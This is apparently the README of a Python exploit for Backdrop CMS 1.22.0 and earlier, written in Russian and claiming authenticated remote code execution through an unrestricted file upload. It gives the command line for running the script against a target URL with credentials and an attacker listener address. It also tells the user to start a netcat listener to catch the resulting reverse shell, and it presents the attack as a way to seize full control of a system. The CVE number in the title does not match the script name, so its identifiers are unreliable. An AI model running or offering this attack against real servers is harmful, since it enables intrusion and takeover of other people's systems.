
CVE-2023-46818 Python3-эксплойт для Backdrop CMS <= 1.22.0: аутентифицированное удалённое выполнение команд (RCE)
Этот скрипт эксплойта на Python нацелен на неограниченную загрузку файлов в Backdrop CMS для достижения удалённого выполнения кода (RCE).
Версия 1.22.0 и более ранние версии Примечание: Backdrop CMS оспаривает это и утверждает, что требуются расширенные права доступа, поэтому уязвимость может сохраняться в версиях выше 1.22.0. Полагаю, они имеют в виду, что сначала понадобится доступ администратора. Тем не менее, это реальная уязвимость, и её определённо можно использовать для получения полного контроля над системой.
python3 CVE-2022-42902.py <target_url> <username> <password> <listener_ip> <listener_port>
Важно: запустите ваш listener перед запуском скрипта:
nc -lvnp <listener_port>
